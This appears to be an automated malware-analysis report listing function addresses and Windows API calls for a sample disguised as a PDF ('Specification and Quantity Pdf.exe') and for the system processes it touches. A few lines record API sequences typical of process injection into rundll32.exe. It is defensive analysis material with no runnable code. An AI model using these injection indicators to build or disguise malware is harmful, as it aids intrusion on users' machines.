          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0035A50B NtAllocateVirtualMemory,10_2_0035A50B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042C9DDD NtReadVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtResumeThread,NtClose,10_2_042C9DDD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042CA036 NtQueryInformationProcess,NtReadVirtualMemory,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,10_2_042CA036
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042C9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,10_2_042C9BAF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042C9DE2 NtReadVirtualMemory,NtProtectVirtualMemory,10_2_042C9DE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042CA042 NtQueryInformationProcess,10_2_042CA042
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_042C9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,10_2_042C9BB2
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C823700_2_00007FF773C82370
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C693400_2_00007FF773C69340
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C7D16A0_2_00007FF773C7D16A
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C788300_2_00007FF773C78830
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C80C500_2_00007FF773C80C50
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C7DFD00_2_00007FF773C7DFD0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C8B4F00_2_00007FF773C8B4F0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C744D00_2_00007FF773C744D0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C604700_2_00007FF773C60470
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C814700_2_00007FF773C81470
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773D034800_2_00007FF773D03480
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C594300_2_00007FF773C59430
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C7A4200_2_00007FF773C7A420
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C583C40_2_00007FF773C583C4
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C703600_2_00007FF773C70360
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C843900_2_00007FF773C84390
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C8D3200_2_00007FF773C8D320
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C852E00_2_00007FF773C852E0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C892CE0_2_00007FF773C892CE
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C8F2800_2_00007FF773C8F280
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773D2E2400_2_00007FF773D2E240
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C582200_2_00007FF773C58220
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C912000_2_00007FF773C91200
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C782000_2_00007FF773C78200
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C752000_2_00007FF773C75200
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C891B00_2_00007FF773C891B0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C761900_2_00007FF773C76190
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C8B1800_2_00007FF773C8B180
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C888D90_2_00007FF773C888D9
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773CB19100_2_00007FF773CB1910
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C5A8B00_2_00007FF773C5A8B0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C6E8A00_2_00007FF773C6E8A0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C7A8500_2_00007FF773C7A850
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C767F00_2_00007FF773C767F0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C8C8000_2_00007FF773C8C800
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C8A7B00_2_00007FF773C8A7B0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C627500_2_00007FF773C62750
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C7B6B00_2_00007FF773C7B6B0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C736400_2_00007FF773C73640
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C766100_2_00007FF773C76610
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C835C00_2_00007FF773C835C0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C715200_2_00007FF773C71520
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C8E5400_2_00007FF773C8E540
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C74CD90_2_00007FF773C74CD9
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C87C790_2_00007FF773C87C79
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C85C200_2_00007FF773C85C20
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C8BBA00_2_00007FF773C8BBA0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773D17BA00_2_00007FF773D17BA0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C7FB400_2_00007FF773C7FB40
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773D12AC00_2_00007FF773D12AC0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C66A500_2_00007FF773C66A50
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C56A500_2_00007FF773C56A50
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C79A500_2_00007FF773C79A50
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C94A400_2_00007FF773C94A40
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C61A000_2_00007FF773C61A00
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C899C30_2_00007FF773C899C3
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C8F9600_2_00007FF773C8F960
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773D200E00_2_00007FF773D200E0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C680D00_2_00007FF773C680D0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C6EFE00_2_00007FF773C6EFE0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C83F600_2_00007FF773C83F60
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C8BEA00_2_00007FF773C8BEA0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C7FDD00_2_00007FF773C7FDD0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 0_2_00007FF773C72D300_2_00007FF773C72D30
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004010306_2_00401030
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0040120A6_2_0040120A
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00402D876_2_00402D87
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00402D906_2_00402D90
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00409E5B6_2_00409E5B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00409E606_2_00409E60
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041DECA6_2_0041DECA
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041D7306_2_0041D730
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00402FB06_2_00402FB0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0388739A6_2_0388739A
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384E3F06_2_0384E3F0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_039003E66_2_039003E6
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F132D6_2_038F132D
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382D34C6_2_0382D34C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038FA3526_2_038FA352
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038452A06_2_038452A0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385B2C06_2_0385B2C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E12ED6_2_038E12ED
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E02746_2_038E0274
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384B1B06_2_0384B1B0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_039001AA6_2_039001AA
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F81CC6_2_038F81CC
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038301006_2_03830100
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038DA1186_2_038DA118
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0387516C6_2_0387516C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F1726_2_0382F172
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0390B16B6_2_0390B16B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038EF0CC6_2_038EF0CC
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038470C06_2_038470C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F70E96_2_038F70E9
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038FF0E06_2_038FF0E0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038FF7B06_2_038FF7B0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383C7C06_2_0383C7C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038647506_2_03864750
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038407706_2_03840770
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F16CC6_2_038F16CC
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385C6E06_2_0385C6E0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_039005916_2_03900591
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038DD5B06_2_038DD5B0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038405356_2_03840535
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F75716_2_038F7571
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038EE4F66_2_038EE4F6
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038FF43F6_2_038FF43F
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F24466_2_038F2446
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038314606_2_03831460
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385FB806_2_0385FB80
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F6BD76_2_038F6BD7
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0387DBF96_2_0387DBF9
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038FAB406_2_038FAB40
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038FFB766_2_038FFB76
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383EA806_2_0383EA80
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038DDAAC6_2_038DDAAC
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03885AA06_2_03885AA0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038EDAC66_2_038EDAC6
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038FFA496_2_038FFA49
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F7A466_2_038F7A46
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B3A6C6_2_038B3A6C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038429A06_2_038429A0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0390A9A66_2_0390A9A6
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038499506_2_03849950
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385B9506_2_0385B950
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038569626_2_03856962
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038268B86_2_038268B8
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038438E06_2_038438E0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386E8F06_2_0386E8F0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038AD8006_2_038AD800
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038428406_2_03842840
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384A8406_2_0384A840
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03841F926_2_03841F92
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038FFFB16_2_038FFFB1
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03832FC86_2_03832FC8
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384CFE06_2_0384CFE0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038FFF096_2_038FFF09
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03882F286_2_03882F28
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03860F306_2_03860F30
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B4F406_2_038B4F40
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03852E906_2_03852E90
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038FCE936_2_038FCE93
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03849EB06_2_03849EB0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038FEEDB6_2_038FEEDB
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038FEE266_2_038FEE26
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03840E596_2_03840E59
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03858DBF6_2_03858DBF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385FDC06_2_0385FDC0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383ADE06_2_0383ADE0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384AD006_2_0384AD00
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03843D406_2_03843D40
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F1D5A6_2_038F1D5A
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F7D736_2_038F7D73
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038E0CB56_2_038E0CB5
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03830CF26_2_03830CF2
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038FFCF26_2_038FFCF2
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03840C006_2_03840C00
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B9C326_2_038B9C32
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03B5A0366_2_03B5A036
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03B5B2326_2_03B5B232
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03B510826_2_03B51082
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03B5E5CD6_2_03B5E5CD
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03B55B306_2_03B55B30
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03B55B326_2_03B55B32
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03B589126_2_03B58912
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03B52D026_2_03B52D02
          Source: C:\Windows\explorer.exeCode function: 8_2_0E7942328_2_0E794232
          Source: C:\Windows\explorer.exeCode function: 8_2_0E78EB308_2_0E78EB30
          Source: C:\Windows\explorer.exeCode function: 8_2_0E78EB328_2_0E78EB32
          Source: C:\Windows\explorer.exeCode function: 8_2_0E7930368_2_0E793036
          Source: C:\Windows\explorer.exeCode function: 8_2_0E78A0828_2_0E78A082
          Source: C:\Windows\explorer.exeCode function: 8_2_0E7919128_2_0E791912
          Source: C:\Windows\explorer.exeCode function: 8_2_0E78BD028_2_0E78BD02
          Source: C:\Windows\explorer.exeCode function: 8_2_0E7975CD8_2_0E7975CD
          Source: C:\Windows\explorer.exeCode function: 8_2_10A472328_2_10A47232
          Source: C:\Windows\explorer.exeCode function: 8_2_10A3D0828_2_10A3D082
          Source: C:\Windows\explorer.exeCode function: 8_2_10A460368_2_10A46036
          Source: C:\Windows\explorer.exeCode function: 8_2_10A4A5CD8_2_10A4A5CD
          Source: C:\Windows\explorer.exeCode function: 8_2_10A41B308_2_10A41B30
          Source: C:\Windows\explorer.exeCode function: 8_2_10A41B328_2_10A41B32
          Source: C:\Windows\explorer.exeCode function: 8_2_10A3ED028_2_10A3ED02
          Source: C:\Windows\explorer.exeCode function: 8_2_10A449128_2_10A44912
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0456244610_2_04562446
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044A146010_2_044A1460
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0456F43F10_2_0456F43F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0455E4F610_2_0455E4F6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0456757110_2_04567571
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044B053510_2_044B0535
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0457059110_2_04570591
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0454D5B010_2_0454D5B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045616CC10_2_045616CC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044CC6E010_2_044CC6E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044D475010_2_044D4750
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044B077010_2_044B0770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044AC7C010_2_044AC7C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0456F7B010_2_0456F7B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044B70C010_2_044B70C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0455F0CC10_2_0455F0CC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0456F0E010_2_0456F0E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045670E910_2_045670E9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0453815810_2_04538158
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044E516C10_2_044E516C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0449F17210_2_0449F172
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0457B16B10_2_0457B16B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044A010010_2_044A0100
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0454A11810_2_0454A118
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045681CC10_2_045681CC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044BB1B010_2_044BB1B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045701AA10_2_045701AA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0455027410_2_04550274
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044CB2C010_2_044CB2C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045302C010_2_045302C0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045512ED10_2_045512ED
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044B52A010_2_044B52A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0456A35210_2_0456A352
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0449D34C10_2_0449D34C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0456132D10_2_0456132D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045703E610_2_045703E6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044BE3F010_2_044BE3F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044F739A10_2_044F739A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044B0C0010_2_044B0C00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04529C3210_2_04529C32
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0456FCF210_2_0456FCF2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044A0CF210_2_044A0CF2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04550CB510_2_04550CB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044B3D4010_2_044B3D40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04561D5A10_2_04561D5A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04567D7310_2_04567D73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044BAD0010_2_044BAD00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044CFDC010_2_044CFDC0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044AADE010_2_044AADE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044C8DBF10_2_044C8DBF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044B0E5910_2_044B0E59
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0456EE2610_2_0456EE26
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0456EEDB10_2_0456EEDB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0456CE9310_2_0456CE93
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044C2E9010_2_044C2E90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044B9EB010_2_044B9EB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04524F4010_2_04524F40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0456FF0910_2_0456FF09
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044F2F2810_2_044F2F28
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044D0F3010_2_044D0F30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044A2FC810_2_044A2FC8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044BCFE010_2_044BCFE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044B1F9210_2_044B1F92
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0456FFB110_2_0456FFB1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0452EFA010_2_0452EFA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044B284010_2_044B2840
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044BA84010_2_044BA840
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0451D80010_2_0451D800
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044B38E010_2_044B38E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044DE8F010_2_044DE8F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044968B810_2_044968B8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044B995010_2_044B9950
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044CB95010_2_044CB950
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044C696210_2_044C6962
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044B29A010_2_044B29A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0457A9A610_2_0457A9A6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04567A4610_2_04567A46
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0456FA4910_2_0456FA49
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04523A6C10_2_04523A6C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0455DAC610_2_0455DAC6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044AEA8010_2_044AEA80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_044F5AA010_2_044F5AA0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0454DAAC10_2_0454DAAC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0456AB4010_2_0456AB40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0456FB7610_2_0456FB76
